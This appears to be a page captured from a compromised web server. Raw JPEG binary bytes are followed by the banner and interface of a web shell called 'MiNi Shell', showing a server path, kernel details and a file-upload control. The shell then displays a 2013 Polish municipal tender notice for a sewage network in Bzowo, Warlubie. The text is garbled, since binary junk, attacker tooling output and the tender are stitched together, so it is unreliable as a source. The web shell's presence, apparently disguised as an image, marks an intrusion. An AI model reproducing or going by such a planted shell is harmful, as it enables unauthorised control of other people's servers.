JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131119/471692-N-2013.html

<p class="kh_header"><b>Warlubie: Budowa sieci kanalizacyjnej z przyłączami, tłoczniami   i przepompownią ścieków w Bzowie</b><br>
<b>Numer ogłoszenia: 471692 - 2013; data zamieszczenia: 19.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy w Warlubiu , ul. Dworcowa 15, 86-160 Warlubie, woj. kujawsko-pomorskie, tel. 52 3326040, faks 52 2236054.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.warlubie.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.warlubie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci kanalizacyjnej z przyłączami, tłoczniami   i przepompownią ścieków w Bzowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest budowa kanalizacji wraz z przyłączami, tłoczniami  i przepompownią ścieków w Bzowie.  Sieć kanalizacyjna grawitacyjną zaprojektowano z rur i kształtek PVC o średnicy O 200 mm zlokalizowane w drogach o SN 8 a na terenach rolnych SN4.  Uzbrojeniem sieci będą studzienki rewizyjne i przyłączeniowe żelbetowe o średnicy  O 1200. Studzienki wbudowane w terenie rolniczym należy usytuować 40cm powyżej terenu. Włazy żeliwne typu lekkiego. Na drogach gminnych zamontowane będą włazy typu ciężkiego. Studzienki nr 2 i 3 zaprojektowane zostały z tworzyw PCV o średnicy O 400. Przy zagłębieniu przewodu kanalizacyjnego powyżej 1,20 m, należy wykonać ocieplenie z warstwy szlaki grubości 30 cm oraz przykryć folią. Głębokość posadowienia przewodów pokazano na profilach podłużnych. Długość przewodu grawitacyjnego wynosi 2565 m. Przed ułożeniem przewodów należy wykonać podsypkę grubości 15cm.

Sieć tłoczna została zaprojektowana z rur PE o średnicy O 110 i 63. Na trasie sieci O 100 w najniższym punkcie projektuje się studzienkę odwadniającą O 1000. Długość przewodu tłocznego O 100 wynosi 1610 m a przewodu O 63 - 651 m. Głębokość ta wynosi 1,5m. Nad przewodem będzie umieszczona taśma ostrzegawcza. 

Przyłącza grawitacyjne zaprojektowano z rur i kształtek PVC o średnicy O 160. Uzbrojeniem przyłączy będą studzienki PCV o średnicy O 315. Długość przyłączy grawitacyjnych 1106 m. Ilość przyłączy - 32.

Przyłącza tłoczne zaprojektowano z rur PE40. Długość przyłączy wynosi 771 m. Ilość przyłączy - 7. Każde przyłącze posiada przydomową przepompownię ścieków typu INWAP z pompą wyporową ORKA 5/4 - 3 fazową. Obudowa przepompowni z tworzyw sztucznych PE o średnicy 800mm. 
Parametry pompy: 
Wydajność-Q=0.71/sek
Ciśnienie-q=0.55 Mpa
Podnoszenie H=100m
Moc P=1.1 KW
Napięcie U=400V

Przewierty - trasa Siecie kanalizacyjnej grawitacyjnej i tłocznej przebiega pod drogami krajowymi, powiatowymi i gminnymi. Zachodzi konieczność wykonania przewiertów w celu montażu rur osłonowych a następnie przeciągnięcie w nich rur przewodowych. 
Projektowane są następujące przewierty:
- pod drogą krajową nr 1:
1. przewiert rurą PE RC O 400x22.7 z powłoką zewnętrzną PP-PN10 -SDR17 - długość 50m
2. przewiert rurą PE RC O 400x22.7 z powłoką zewnętrzną PP-PN10 -SDR17 - długość 25m 3. przewiert rurą PE       O 125 - SDR 11  -   długość 25m
- pod drogami powiatowymi:
1.   przewiert rurą PE       O 125 -   SDR17 -  długość 20m
2.   przewiert rurą PE       O 124 -   SDR17 -  długość 7m
3.   przewiert rurą PE       O 400 -   SDR17 - długość 7m

Tłocznie 
Tłocznia nr 1 zlokalizowana jest na działce 54, gdzie teren obniżony jest w stosunku do przyległej drogi powiatowej o około 1 m. Tą różnicę należy zniwelować poprzez wykonanie nasypu. Boki nasypu należy wzmocnić płytami betonowymi ażurowymi. W miejscu zasypanego rowu zamontować należy przepust z rur PCV  O 300. Teren tłoczni należy ogrodzić siatką na słupach stalowych. Od strony drogi wykonać należy bramę szerokości 3 m. Cały teren tłoczni i wjazd należy ułożyć kostką betonową POLBRUK zakończoną obrzeżami betonowymi. 
Tłocznia nr 2 zlokalizowana jest na działce 15/2 (Gmina Warlubie) Działka zlokalizowana przy drodze powiatowej Bzowo-Bąkowo. Powierzchnia działki z dojazdem do drogi asfaltowej wynosi 62 m2. Na terenie działki zlokalizowana będzie studnia rewizyjna O 1200 oraz tłocznia ścieków T2. Działkę należy ogrodzić siatką na słupach stalowych. Od strony drogi wykonać należy bramę szerokości 3 m. Teren wjazdu oraz część działki należy ułożyć kostką betonową POLBRUK zakończoną obrzeżami betonowymi. 
Zestawienie ogólne:
Sieć kanalizacyjna:
1. Sieć kanalizacyjna   O 200 PVC- 2565 m
2. Sieć kanalizacyjna   O 110 PE-  1610 m
3. Sieć kanalizacyjna   O 63 PE  -   651 m
4. Studnia żelbetowa   O 1200  -   46 kpl
5.  Studnia żelbetowa odwadniająca   O 1000    - 1 kpl.
6. Tłocznia ścieków typ TSA 1.20 -T1- 1 kpl.
7. Tłocznia ścieków typ TSA 1.20 -T2 - 1 kpl.
8. Studnia PCV O 400 - 2 kpl
Przyłącza:
1. Przyłącza grawitacyjne   O 150 PVC  - 32 szt. - 1106 m
2. Przyłącza tłoczne O 40-     7 szt. - 771 m
3. Przydomowe przepompownie INWAP - 7 kpl.
4. Studnie przelotowe PCV O 325 mm  - 32 szt.              
       
Elektryka
Obiekty:
1. Tłocznia ścieków nr 1 dz. nr 53
2. Tłocznia ścieków nr 2 dz. nr 15/2
3. Przepompownia ścieków nr 1 dz. nr 16/2
4. Przepompownia ścieków nr 2 dz. nr 10/4
5. Przepompownia ścieków nr 35 dz. nr 2/3
6. Przepompownia ścieków nr 36 dz. nr 2/18
7. Przepompownia ścieków nr 37 dz. nr 2/10
8. Przepompownia ścieków nr 38 dz. nr 8/2
9. Przepompownia ścieków nr 39 dz. nr 146
W zakresie opracowania elektrycznego wchodzi wybudowanie wewnętrznych linii zasilających kablem typu YKY 5x6,0mm2 tłocznie ścieków 1 i 2 oraz kablem YKY 5x2,5mm2 przepompowni ścieków nr 1,23,35,36,37,38,39.

Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej, specyfikacji technicznej oraz w przedmiarze robót. Dokumenty te stanowią załączniki do niniejszej specyfikacji.
 Dokumentacja projektowa jest integralną częścią SIWZ i jest dostępna na stronie internetowej Zamawiającego http://www.bip.warlubie.pl/.
Podane w SIWZ, w dokumentacji projektowej i opisach technicznych  oraz w załącznikach znaki towarowe materiałów, urządzeń, patenty lub ich pochodzenie są wyłącznie przykładowymi nazewnictwami, nie wiążącymi oferenta. Zapisy te należy rozumieć jako wzorzec jakościowy. Określenie przedmiotu zamówienia poprzez wskazanie nazwy producenta, typu urządzenia lub sprzętu ma na celu doprecyzowanie przedmiotu zamówienia. Zamawiający dopuszcza możliwość  zastosowania rozwiązań równoważnych, pod warunkiem, że zaproponowane rozwiązania równoważne (materiały, urządzenia, sprzęt ) będą posiadały parametry techniczne i funkcjonalne nie gorsze niż te, które są określone w przedmiotowych dokumentach.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp w wysokości 50% ogólnej wartości zamówienia. Przedmiot zamówień uzupełniających będzie zgodny z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.12.00-0, 45.23.24.10-9, 45.23.24.23-3, 45.23.24.00-6, 45.23.24.52-5, 45.23.32.20-7, 45.31.43.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 9.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Warunkiem udziału w postępowaniu jest wniesienie przez Wykonawcę wadium w wysokości 40.000,00 zł. słownie: czterdzieści tysięcy złotych
2. Wadium musi być wniesione przed upływem terminu składania ofert, może być wnoszone w jednej lub kilku następujących formach:
1 pieniądzu;
2 poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3 gwarancjach bankowych;
4 gwarancjach ubezpieczeniowych;
5 poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz.U. z 2007 r. Nr. 42 poz. 275.
3. Wadium wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Urzędu Gminy w Warlubiu nr 44 8173 0005 2002 0006 0017 0002  Bank Spółdzielczy  w Nowem oddział Warlubie.  Do oferty należy dołączyć kserokopię wnoszonego wadium.
4. W przypadku wadium wniesionego w formie gwarancji , z treści tej gwarancji winno wynikać bezwarunkowo, że na każde pisemne żądanie zgłoszone przez Zamawiającego, w terminie związania ofertą, gwarant zobowiązuje się do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 u. p. z. p.
Gwarancja ma być sporządzona zgodnie z obowiązującym prawem i winna zawierać następujące elementy:
- nazwę dającego zlecenie Wykonawcy, beneficjenta gwarancji Zamawiającego,
gwaranta banku lub instytucji ubezpieczeniowej udzielających gwarancji oraz wskazanie ich siedzib,
- gwarancja musi być podpisana przez upoważnionego -upełnomocnionego przedstawiciela Gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikacje np. złożony wraz z imienną pieczątką lub czytelnie z podaniem imienia i nazwiska,
- określenie przedmiotu postępowania,
- określenie wierzytelności, która ma być zabezpieczona gwarancją,
- kwotę gwarancji,
- termin ważności gwarancji,
- bezwarunkowe i nieodwołalne zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
 -odmówił podpisania umowy na warunkach określonych w ofercie, lub
-nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy
-Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie,
a w przypadku gwarancji wystawionej przez podmiot mający siedzibę poza terytorium Rzeczypospolitej Polskiej, dodatkowo:
- wybór prawa polskiego właściwości miejscowej sądu według siedziby Zamawiającego dla rozstrzygania sporów z tytułu przedmiotu gwarancji.
5. Postanowienia pkt.11. 4. stosuje się odpowiednio do poręczeń.
6. Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.
7. Zwrot wadium następuje na zasadach określonych w art. 46 u. p. z. p.
8.Zamawiający zwraca wadium wniesione w formie pieniężnej wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że należycie wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej  roboty budowlanej o podobnym charakterze i wartości zbliżonej do robót budowlanych stanowiących przedmiot zamówienia, z podaniem wartości, daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Uwaga:
Roboty budowlane o podobnym charakterze i wartości zbliżonej do robót budowlanych stanowiących przedmiot zamówienia  to  jedna robota  o wartości co najmniej 1.000.000,00 zł polegająca na  budowie sieci kanalizacji sanitarnej grawitacyjnej  i sieci kanalizacyjnej tłocznej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w wykonywaniu zamówienia i sprawować funkcję kierownika budowy oraz kierowników robót w poszczególnych branżach
1. Kierownik budowy -koordynator całości inwestycji- sprawujący pieczę nad koordynacją robót poszczególnych branż, sprawujący jednocześnie funkcję kierownika  robót ,   w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych  posiadający uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji -i urządzeń wodociągowych i kanalizacyjnych bez ograniczeń,
2. Kierownik robót elektrycznych posiadający uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń,
3. Kierownik robót drogowych posiadający uprawnienia do sprawowania samodzielnych funkcji technicznych w budownictwie o specjalności drogowej. 

Osoby sprawujące w/w funkcje muszą należeć do odpowiedniej izby samorządu zawodowego - dysponować aktualnym zaświadczeniem o przynależności do Izby Inżynierów Budownictwa, posiadać stosowne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń art. 12a, ust. 1 oraz art. 14 ust. 1 ustawy z dnia 7 lipca 1994 r. Prawo budowlane Dz. U. z 2006 r., Nr 156, poz. 1118 z późn. zm./), wydane na podstawie rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie Dz.U z 2006 r. Nr 83, poz. 578 z późn. zm. lub równoważne uprawnienia wydane na podstawie przepisów obowiązujących przed dniem wejścia w życie w/w rozporządzenia oraz posiadać wymagane doświadczenie zawodowe w kierowaniu robotami budowlanymi.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający wymaga od Wykonawcy posiadania polisy ubezpieczeniowej z tytułu odpowiedzialności cywilnej za szkody wyrządzone przez Wykonawcę osobom trzecim  w związku z wykonywaniem umowy na sumę nie mniejszą niż 200.000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>jednej roboty budowlanej o podobnym charakterze i wartości zbliżonej do robót budowlanych stanowiących przedmiot zamówienia  o wartości co najmniej 1.000.000,00 zł jeden milion zł polegająca na  budowie sieci kanalizacji sanitarnej grawitacyjnej  i sieci kanalizacyjnej tłocznej.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwa , jeżeli dotyczą</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. gdy wprowadzenie zmian jest korzystne dla Zamawiającego
2. wystąpienie zdarzeń losowych  w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
3. zmiany terminów wykonania robót, w przypadku gdy o zmianę taką wystąpi Zamawiający, lub zmiana taka stanie się konieczna ze względu na okoliczności, których nie można było przewidzieć w chwili składania oferty lub wystąpią istotne zmiany zakresu rzeczowego robót wynikające ze zmian projektowych, a zmianę zaakceptuje Zamawiający,
4.  zmiany osób lub podmiotów odpowiedzialnych za realizację zadania ze strony Wykonawcy lub Zamawiającego,
5. wystąpienie zmian których konieczność wprowadzenia będzie wynikała z wymagań instytucji współfinansujących realizację przedmiotu umowy.
6. nastąpienie zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenie jednej lub obu stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.warlubie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Warlubie ul. Dworcowa 15, 86-160 Warlubie sekretariat pok.10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.12.2013 godzina 11:00, miejsce: Urząd Gminy Warlubie ul. Dworcowa 15, 86-160 Warlubie sekretariat pok.10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany w ramach działania 321 Podstawowe usługi dla gospodarki  i ludności wiejskiej - Program Rozwoju  Obszarów Wiejskich na lata 2007-2013..</p>
